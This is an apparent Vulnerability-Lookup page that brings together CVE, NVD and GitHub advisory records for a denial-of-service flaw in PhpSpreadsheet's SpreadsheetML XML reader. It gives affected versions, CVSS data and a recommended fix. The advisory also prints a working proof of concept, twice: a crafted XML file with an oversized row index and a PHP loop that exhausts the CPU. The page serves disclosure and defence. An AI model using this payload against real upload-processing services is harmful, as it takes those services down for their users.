Vulnerability-Lookup

CVE-2026-40863 (GCVE-0-2026-40863)

Vulnerability from cvelistv5 – Published: 2026-05-12 22:04 – Updated: 2026-05-13 15:03

Title

PhpSpreadsheet: CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader

Summary

PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0, the SpreadsheetML XML reader (Reader\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index="999999999" on a <Row> element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. This vulnerability is fixed in 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/PHPOffice/PhpSpreadsheet/secur…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
PHPOffice	PhpSpreadsheet	Affected: < 1.30.4 Affected: >= 2.0.0, < 2.1.16 Affected: >= 2.2.0, < 2.4.5 Affected: >= 3.3.0, < 3.10.5 Affected: >= 4.0.0, < 5.7.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40863",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-13T15:01:42.488212Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-13T15:03:23.782Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "PhpSpreadsheet",
          "vendor": "PHPOffice",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.30.4"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.0.0, \u003c 2.1.16"
            },
            {
              "status": "affected",
              "version": "\u003e= 2.2.0, \u003c 2.4.5"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.3.0, \u003c 3.10.5"
            },
            {
              "status": "affected",
              "version": "\u003e= 4.0.0, \u003c 5.7.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0, the SpreadsheetML XML reader (Reader\\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index=\"999999999\" on a \u003cRow\u003e element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. This vulnerability is fixed in 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770: Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-12T22:04:29.510Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6"
        }
      ],
      "source": {
        "advisory": "GHSA-84wq-86v6-x5j6",
        "discovery": "UNKNOWN"
      },
      "title": "PhpSpreadsheet: CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40863",
    "datePublished": "2026-05-12T22:04:29.510Z",
    "dateReserved": "2026-04-15T15:57:41.717Z",
    "dateUpdated": "2026-05-13T15:03:23.782Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40863",
      "date": "2026-05-13",
      "epss": "0.0004",
      "percentile": "0.12053"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40863\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-12T22:16:33.783\",\"lastModified\":\"2026-05-13T18:01:19.827\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0, the SpreadsheetML XML reader (Reader\\\\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index=\\\"999999999\\\" on a \u003cRow\u003e element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. This vulnerability is fixed in 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.30.4\",\"matchCriteriaId\":\"21F2C6F6-C903-4A65-BCB4-4549FE752ED5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.0\",\"versionEndExcluding\":\"2.1.16\",\"matchCriteriaId\":\"E27B01CE-562C-4746-A7F5-E402B25F0B47\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.2.0\",\"versionEndExcluding\":\"2.4.5\",\"matchCriteriaId\":\"46FF2D5E-816F-481B-AA45-41BA6EDCFEA0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.3.0\",\"versionEndExcluding\":\"3.10.5\",\"matchCriteriaId\":\"DF58DF5C-8F1B-4B1B-80A0-001B47751D9F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.0.0\",\"versionEndExcluding\":\"5.7.0\",\"matchCriteriaId\":\"DD7DEDE3-C624-4524-9B08-08B92F28C40C\"}]}]}],\"references\":[{\"url\":\"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40863\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-13T15:01:42.488212Z\"}}}], \"references\": [{\"url\": \"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-13T15:02:26.467Z\"}}], \"cna\": {\"title\": \"PhpSpreadsheet: CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader\", \"source\": {\"advisory\": \"GHSA-84wq-86v6-x5j6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"PHPOffice\", \"product\": \"PhpSpreadsheet\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.30.4\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.0.0, \u003c 2.1.16\"}, {\"status\": \"affected\", \"version\": \"\u003e= 2.2.0, \u003c 2.4.5\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.3.0, \u003c 3.10.5\"}, {\"status\": \"affected\", \"version\": \"\u003e= 4.0.0, \u003c 5.7.0\"}]}], \"references\": [{\"url\": \"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6\", \"name\": \"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0, the SpreadsheetML XML reader (Reader\\\\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index=\\\"999999999\\\" on a \u003cRow\u003e element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. This vulnerability is fixed in 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-12T22:04:29.510Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40863\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-13T15:03:23.782Z\", \"dateReserved\": \"2026-04-15T15:57:41.717Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-12T22:04:29.510Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-40863

Vulnerability from fkie_nvd - Published: 2026-05-12 22:16 - Updated: 2026-05-13 18:01

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6	Exploit, Mitigation, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6	Exploit, Mitigation, Vendor Advisory

Impacted products

Vendor	Product	Version
phpoffice	phpspreadsheet	*
phpoffice	phpspreadsheet	*
phpoffice	phpspreadsheet	*
phpoffice	phpspreadsheet	*
phpoffice	phpspreadsheet	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "21F2C6F6-C903-4A65-BCB4-4549FE752ED5",
              "versionEndExcluding": "1.30.4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E27B01CE-562C-4746-A7F5-E402B25F0B47",
              "versionEndExcluding": "2.1.16",
              "versionStartIncluding": "2.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "46FF2D5E-816F-481B-AA45-41BA6EDCFEA0",
              "versionEndExcluding": "2.4.5",
              "versionStartIncluding": "2.2.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF58DF5C-8F1B-4B1B-80A0-001B47751D9F",
              "versionEndExcluding": "3.10.5",
              "versionStartIncluding": "3.3.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD7DEDE3-C624-4524-9B08-08B92F28C40C",
              "versionEndExcluding": "5.7.0",
              "versionStartIncluding": "4.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "PhpSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Prior to 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0, the SpreadsheetML XML reader (Reader\\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index=\"999999999\" on a \u003cRow\u003e element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. This vulnerability is fixed in 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0."
    }
  ],
  "id": "CVE-2026-40863",
  "lastModified": "2026-05-13T18:01:19.827",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-12T22:16:33.783",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-84WQ-86V6-X5J6

Vulnerability from github – Published: 2026-04-29 20:23 – Updated: 2026-05-13 16:31

Summary

PhpSpreadsheet has CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader

Details

Summary

The SpreadsheetML XML reader (Reader\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index="999999999" on a <Row> element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service.

Details

In src/PhpSpreadsheet/Reader/Xml.php, the loadSpreadsheetFromFile method processes <Row> elements:

// Xml.php:397-402
if (isset($row_ss['Index'])) {
    $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW
}
if (isset($row_ss['Hidden'])) {
    $rowVisible = ((string) $row_ss['Hidden']) !== '1';
    $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible);
}

The $rowID value read from ss:Index is cast to int with no upper bound check. It is then passed to getRowDimension():

// Worksheet.php:1342-1351
public function getRowDimension(int $row): RowDimension
{
    if (!isset($this->rowDimensions[$row])) {
        $this->rowDimensions[$row] = new RowDimension($row);
        $this->cachedHighestRow = max($this->cachedHighestRow, $row);
    }
    return $this->rowDimensions[$row];
}

This inflates cachedHighestRow to the attacker-controlled value. Additionally, at line 412, $cellRange = $columnID . $rowID is constructed and passed to getCell(), which calls createNewCell() (Worksheet.php:1294) and also sets cachedHighestRow.

The RowIterator constructor uses getHighestRow() as its default end row:

// RowIterator.php:84-88
public function resetEnd(?int $endRow = null): static
{
    $this->endRow = $endRow ?: $this->subject->getHighestRow();
    return $this;
}

With cachedHighestRow at ~1 billion, iterating over rows causes CPU exhaustion. The DefaultReadFilter provides no protection — it returns true for all cells.

Even without the Hidden attribute, any cell data within the row still uses the inflated $rowID at line 412, so the ss:Hidden attribute is not required to trigger the vulnerability.

PoC

Create poc.xml:

<?xml version="1.0"?>
<?mso-application progid="Excel.Sheet"?>
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet"
 xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet">
 <Worksheet ss:Name="Sheet1">
  <Table>
   <Row ss:Index="999999999" ss:Hidden="1"/>
   <Row><Cell><Data ss:Type="String">test</Data></Cell></Row>
  </Table>
 </Worksheet>
</Workbook>

Load and iterate:

<?php
require 'vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\IOFactory;

$reader = IOFactory::createReader('Xml');
$spreadsheet = $reader->load('poc.xml');
$sheet = $spreadsheet->getActiveSheet();

echo "Highest row: " . $sheet->getHighestRow() . "\n";
// Outputs: Highest row: 1000000000

// This loop will attempt ~1 billion iterations → CPU exhaustion
foreach ($sheet->getRowIterator() as $row) {
    // Never completes
}

Impact

Any PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by:

Exhausting server CPU with a single small XML file (~300 bytes)
Blocking the PHP worker process, potentially affecting all concurrent users
Triggering PHP max_execution_time limits that still consume resources before killing the process

The attack requires no authentication — only the ability to upload or cause the application to process a crafted SpreadsheetML file.

Recommended Fix

Add MAX_ROW validation after reading the ss:Index attribute in src/PhpSpreadsheet/Reader/Xml.php:

// After line 398:
if (isset($row_ss['Index'])) {
    $rowID = (int) $row_ss['Index'];
    if ($rowID > AddressRange::MAX_ROW) {
        $rowID = AddressRange::MAX_ROW;
    }
}

Add the necessary import at the top of the file:

use PhpOffice\PhpSpreadsheet\Cell\AddressRange;

The same validation should also be applied to the ss:Index attribute on <Cell> elements (line 409) for the column dimension.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.6.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "5.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.10.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0"
            },
            {
              "fixed": "3.10.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.4.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.4.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.15"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.30.3"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "phpoffice/phpspreadsheet"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.30.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40863"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T20:23:27Z",
    "nvd_published_at": "2026-05-12T22:16:33Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe SpreadsheetML XML reader (`Reader\\Xml`) does not validate the `ss:Index` row attribute against the maximum allowed row count (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a SpreadsheetML XML file with `ss:Index=\"999999999\"` on a `\u003cRow\u003e` element, which inflates the internal `cachedHighestRow` to ~1 billion. Any subsequent call to `getRowIterator()` without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service.\n\n## Details\n\nIn `src/PhpSpreadsheet/Reader/Xml.php`, the `loadSpreadsheetFromFile` method processes `\u003cRow\u003e` elements:\n\n```php\n// Xml.php:397-402\nif (isset($row_ss[\u0027Index\u0027])) {\n    $rowID = (int) $row_ss[\u0027Index\u0027]; // No validation against MAX_ROW\n}\nif (isset($row_ss[\u0027Hidden\u0027])) {\n    $rowVisible = ((string) $row_ss[\u0027Hidden\u0027]) !== \u00271\u0027;\n    $spreadsheet-\u003egetActiveSheet()-\u003egetRowDimension($rowID)-\u003esetVisible($rowVisible);\n}\n```\n\nThe `$rowID` value read from `ss:Index` is cast to int with no upper bound check. It is then passed to `getRowDimension()`:\n\n```php\n// Worksheet.php:1342-1351\npublic function getRowDimension(int $row): RowDimension\n{\n    if (!isset($this-\u003erowDimensions[$row])) {\n        $this-\u003erowDimensions[$row] = new RowDimension($row);\n        $this-\u003ecachedHighestRow = max($this-\u003ecachedHighestRow, $row);\n    }\n    return $this-\u003erowDimensions[$row];\n}\n```\n\nThis inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`.\n\nThe `RowIterator` constructor uses `getHighestRow()` as its default end row:\n\n```php\n// RowIterator.php:84-88\npublic function resetEnd(?int $endRow = null): static\n{\n    $this-\u003eendRow = $endRow ?: $this-\u003esubject-\u003egetHighestRow();\n    return $this;\n}\n```\n\nWith `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection \u2014 it returns `true` for all cells.\n\nEven without the `Hidden` attribute, any cell data within the row still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability.\n\n## PoC\n\n1. Create `poc.xml`:\n```xml\n\u003c?xml version=\"1.0\"?\u003e\n\u003c?mso-application progid=\"Excel.Sheet\"?\u003e\n\u003cWorkbook xmlns=\"urn:schemas-microsoft-com:office:spreadsheet\"\n xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"\u003e\n \u003cWorksheet ss:Name=\"Sheet1\"\u003e\n  \u003cTable\u003e\n   \u003cRow ss:Index=\"999999999\" ss:Hidden=\"1\"/\u003e\n   \u003cRow\u003e\u003cCell\u003e\u003cData ss:Type=\"String\"\u003etest\u003c/Data\u003e\u003c/Cell\u003e\u003c/Row\u003e\n  \u003c/Table\u003e\n \u003c/Worksheet\u003e\n\u003c/Workbook\u003e\n```\n\n2. Load and iterate:\n```php\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\n\n$reader = IOFactory::createReader(\u0027Xml\u0027);\n$spreadsheet = $reader-\u003eload(\u0027poc.xml\u0027);\n$sheet = $spreadsheet-\u003egetActiveSheet();\n\necho \"Highest row: \" . $sheet-\u003egetHighestRow() . \"\\n\";\n// Outputs: Highest row: 1000000000\n\n// This loop will attempt ~1 billion iterations \u2192 CPU exhaustion\nforeach ($sheet-\u003egetRowIterator() as $row) {\n    // Never completes\n}\n```\n\n## Impact\n\nAny PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by:\n\n- Exhausting server CPU with a single small XML file (~300 bytes)\n- Blocking the PHP worker process, potentially affecting all concurrent users\n- Triggering PHP max_execution_time limits that still consume resources before killing the process\n\nThe attack requires no authentication \u2014 only the ability to upload or cause the application to process a crafted SpreadsheetML file.\n\n## Recommended Fix\n\nAdd MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`:\n\n```php\n// After line 398:\nif (isset($row_ss[\u0027Index\u0027])) {\n    $rowID = (int) $row_ss[\u0027Index\u0027];\n    if ($rowID \u003e AddressRange::MAX_ROW) {\n        $rowID = AddressRange::MAX_ROW;\n    }\n}\n```\n\nAdd the necessary import at the top of the file:\n```php\nuse PhpOffice\\PhpSpreadsheet\\Cell\\AddressRange;\n```\n\nThe same validation should also be applied to the `ss:Index` attribute on `\u003cCell\u003e` elements (line 409) for the column dimension.",
  "id": "GHSA-84wq-86v6-x5j6",
  "modified": "2026-05-13T16:31:32Z",
  "published": "2026-04-29T20:23:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40863"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPOffice/PhpSpreadsheet"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PhpSpreadsheet has CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40863 (GCVE-0-2026-40863)

